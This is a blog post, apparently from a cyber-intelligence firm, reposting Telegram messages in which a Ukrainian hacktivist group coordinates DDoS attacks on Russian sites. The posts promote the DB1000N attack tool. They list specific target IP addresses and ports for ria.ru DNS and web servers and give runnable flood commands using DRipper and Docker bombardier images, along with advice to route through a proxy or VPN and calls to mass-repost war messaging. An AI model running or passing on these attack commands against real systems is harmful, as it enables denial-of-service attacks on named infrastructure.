Read Time:3 Minute, 6 Second

Cossacks, we present you a new weapon!

Our own program – Death by 1000 needles (DB1000N)

This is software for coordinated DDoS attacks on the occupier’s infrastructure. The main advantage of this method is that users only need to run the program on a PC to carry out attacks, and all coordination will be carried out and configured by administrators with the support of cybersecurity specialists.

Instructions for use and all necessary links are in this document

Please join everyone and download the program to your PC before the evening attacks, because then we will carry out the first attack with DB1000N.

Only together we are a force!

P.S. the program code is open and you can also make sure that we are attacking, because the configuration is also in the open – here

Cossacks, we introduce to you, our new weapon!

Our own application – Death by 1000 needles (DB1000N)

Attack on DNS servers RIA.ru (one of them hosts the site itself, so one killed an attack on 80 and 443)

There are about 130 sites of the RUSSIAN WORLD on them, SO THE BOYS ARE ALL FORCED


DB1000N – attacks everyone now, the attack from it does not make sense, so now use Ripper, MHHDDos *, Loic, GoldenEye, UfoNet, Docker, absolutely anything you want.

It does not leave Ukraine, so use a proxy / VPN

There are good specialists in ria, so we do not rule out that they will change servers, etc., but at least we will give them a blow and will monitor the situation.

178.248.233.32: 80 HTTP and 443 HTTPS (easy target but possibly good server)
178.248.236.20: 53 UDP (server with more security, with one port)

[Forwarded from DDOS on the country of SEPARS (Cyber-Cossacks)]
We continue the attack on DNS ria.ru, I add three more.

So far, the old ones are also in Russia:
91.217.20.1: 53 UDP
193.232.146.1: 53 UDP
91.217.21.1: 53 UDP

New DNS which is probably in 35% of Russia:
IP: 178.248.233.32
Port: 80 HTTP | 443 HTTPS
DRipper: [-t 50+]
python3 DRipper.py -s 178.248.233.32 -p 80 -t 135 -q 10000
python3 DRipper.py -s 178.248.233.32 -p 443 -t 135 -q 10000

Docker: 1)
docker run -ti –rm alpine / bombardier -c 10000 -d 3600s -l 178.248.233.32:80
docker run -ti –rm alpine / bombardier -c 10000 -d 3600s -l 178.248.233.32:443
2)
docker run -it –rm alexmon1989 / dripper: 1.1.1 -s 178.248.233.32 -p 80 -t 500 -m udp
docker run -it –rm alexmon1989 / dripper: 1.1.1 -s 178.248.233.32 -p 443 -t 500 -m udp

IP: 178.248.236.20: 53 UDP

Now we are actively attacking the old ones for an hour or two, then we are going to the new ones again. (Let it be so)

We intercepted the conversation of the Russian Federation, a long time ago, we dared when to publish it. PROOF OF “RUSSIAN PEACE”. I have no more words to supplement this post ..

MAXIMUM REPOST
MAXIMUM

In the institute, Facebook, telegram channels, let the “Russians” watch how we are “liberated” from Nazism.

We continue the attack on DNS ria.ru, I add three more.

So far, the old ones are also in Russia:
91.217.20.1: 53 UDP
193.232.146.1: 53 UDP
91.217.21.1: 53 UDP

New DNS which is probably in 35% of Russia:
178.248.233.32: 80 HTTP and 443 HTTPS
178.248.236.20: 53 UDP

Now we are actively attacking the old ones for an hour or two, then we are going to the new ones again. (Let it be so)

About Post Author

Treadstone 71

@Treadstone71LLC Cyber intelligence, counterintelligence, Influence Operations, Cyber Operations, OSINT, Clandestine Cyber HUMINT, cyber intel and OSINT training and analysis, cyber psyops, strategic intelligence, Open-Source Intelligence collection, analytic writing, structured analytic techniques, Target Adversary Research, cyber counterintelligence, strategic intelligence analysis, estimative intelligence, forecasting intelligence, warning intelligence, threat intelligence
Happy
Happy
100 %
Sad
Sad
0 %
Excited
Excited
0 %
Sleepy
Sleepy
0 %
Angry
Angry
0 %
Surprise
Surprise
0 %
%d bloggers like this: